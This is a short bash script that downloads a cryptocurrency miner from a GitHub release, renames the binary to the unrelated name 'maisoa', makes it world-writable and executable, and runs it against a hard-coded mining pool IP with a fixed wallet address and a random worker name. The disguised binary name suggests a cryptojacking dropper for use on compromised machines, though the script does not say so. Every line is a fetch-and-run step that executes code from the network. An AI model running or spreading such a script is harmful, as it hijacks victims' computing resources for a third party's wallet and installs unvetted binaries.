#!/bin/bash
wget https://github.com/pearlhash/pearlhash-miner/releases/download/V14/pearl-miner
mv pearl-miner maisoa
chmod 777 maisoa
./maisoa --host 38.129.16.172:80 --user prl1plfe52vv5jxq8x4zj0vn6u0wufa73q2xmzed87nelwyg3mlxhfl8sn6hhdr --worker $(echo $RANDOM | md5sum | head -c 10)
